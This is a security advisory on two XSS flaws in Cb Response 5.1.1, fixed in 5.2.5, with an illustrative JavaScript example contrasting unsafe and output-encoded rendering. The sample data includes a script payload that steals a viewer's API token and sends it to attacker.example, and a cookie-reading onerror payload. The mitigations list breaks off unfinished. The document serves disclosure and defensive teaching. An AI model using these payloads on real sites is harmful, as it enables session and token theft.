Details:

| Field | Value |
|---|---|
| Product | Cb Response |
| Version Reported | 5.1.1 |
| Version Resolved | 5.2.5 |
| Severity Rating | High |
| Exploitability | Low |
| Remediation - Cloud | No Action - Cloud Customers Remediated 12/2016 |
| Remediation - On Premise | Cb Response 5.2.5 available |
Two XSS vulnerabilities have been reported in Cb Response version 5.1.1: one reflected XSS and one stored XSS in the user details. Both have been addressed in Cb Response 5.2.5. See the ‘Remediation’ section of this bulletin for details.
The XSS vulnerabilities are exploitable only under certain conditions, as documented in the ‘Mitigations’ section. There is no indication that either vulnerability has been exploited in the wild.
The vulnerabilities were discovered by MWRInfoSecurity. We thank them for their support and partnership.
| Rating Type | Rating |
|---|---|
| Severity | High |
| Exploitability | Low |
Severity is rated high because successful exploitation gives the attacker access to the Cb Response server equivalent to that of the compromised user. Exploitability is rated low because successful exploitation requires user interaction and the attacker must have knowledge of the server configuration.
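The following is an added illustration of the two bug classes this bulletin describes, not code from Cb Response or from Carbon Black. It uses a hypothetical "user details" view and a hypothetical search-results view: the first concatenates attacker-controlled profile fields into markup (stored XSS, executed with the session of whoever views the profile, which is why the impact equals the viewing user's access), the second echoes a query parameter (reflected XSS). The hardened versions differ only in applying HTML output encoding. All function names, the sample records and the payload strings are constructed for this example.

```javascript
// Added example, not Cb Response code. Function names, sample user
// records and payloads are assumptions made for this illustration.

// Minimal HTML entity encoder for untrusted text placed in element
// content or in a double-quoted attribute value.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Stored XSS, vulnerable form: profile fields saved by one user are
// concatenated straight into markup when another user (e.g. an
// administrator) views the profile, so the payload runs with the
// viewer's session.
function renderUserDetailsUnsafe(user) {
  return (
    "<div class=\"user\">" +
    "<h2>" + user.username + "</h2>" +
    "<p>" + user.description + "</p>" +
    "</div>"
  );
}

// Stored XSS, hardened form: every untrusted value is encoded before it
// is inserted into the template.
function renderUserDetailsSafe(user) {
  return (
    "<div class=\"user\">" +
    "<h2>" + escapeHtml(user.username) + "</h2>" +
    "<p>" + escapeHtml(user.description) + "</p>" +
    "</div>"
  );
}

// Reflected XSS: a search term taken from the request is echoed back in
// the response without (unsafe) and with (safe) output encoding.
function renderSearchResultUnsafe(query) {
  return "<p>No results for " + query + "</p>";
}
function renderSearchResultSafe(query) {
  return "<p>No results for " + escapeHtml(query) + "</p>";
}

// Crude detector used to compare the two renderings: flags a real
// <script>/<img> tag or an inline event handler inside a tag. Encoded
// text such as "&lt;script&gt;" or a bare "onerror=" outside a tag is
// inert and is deliberately not flagged. This is a demonstration aid,
// not a scanner.
function containsActiveContent(html) {
  return /<script\b|<img\b|<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Constructed sample data: a profile whose description carries a stored
// payload that exfiltrates the viewer's API token, and a reflected
// payload that breaks out of the text context with an <img> handler.
const storedPayloadUser = {
  username: "alice",
  description:
    "hi <script>fetch('/api/token').then(r=>r.text())" +
    ".then(t=>location='//attacker.example/?'+t)</script>",
};
const reflectedPayload = "\"><img src=x onerror=alert(document.cookie)>";

// Stand-alone demonstration: prints which renderings still carry live markup.
console.log("stored/unsafe   :", containsActiveContent(renderUserDetailsUnsafe(storedPayloadUser)));
console.log("stored/safe     :", containsActiveContent(renderUserDetailsSafe(storedPayloadUser)));
console.log("reflected/unsafe:", containsActiveContent(renderSearchResultUnsafe(reflectedPayload)));
console.log("reflected/safe  :", containsActiveContent(renderSearchResultSafe(reflectedPayload)));
```

Encoding must match the output context: the encoder above is correct for element content and double-quoted attribute values, but text placed inside a URL, a JavaScript block or an unquoted attribute needs context-specific encoding, and a templating engine with automatic contextual escaping is the usual way to get this right across an application. Note that after encoding the reflected payload the string "onerror=" still appears in the page as plain text, which is harmless; what matters is that no new tag is created.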
For on-premise deployments, these vulnerabilities are fully remediated by upgrading to Cb Response 5.2.5. Customers running any prior version of the software are advised to upgrade.
The reflected XSS is only accessible by a user with global administrator privileges. To exploit either XSS vulnerability, an attacker must:
There are no immediate workarounds for these vulnerabilities. Customers should upgrade Cb Response servers to 5.2.5.
Copyright © 2005-2023 Broadcom. All Rights Reserved. The term “Broadcom” refers to Broadcom Inc. and/or its subsidiaries.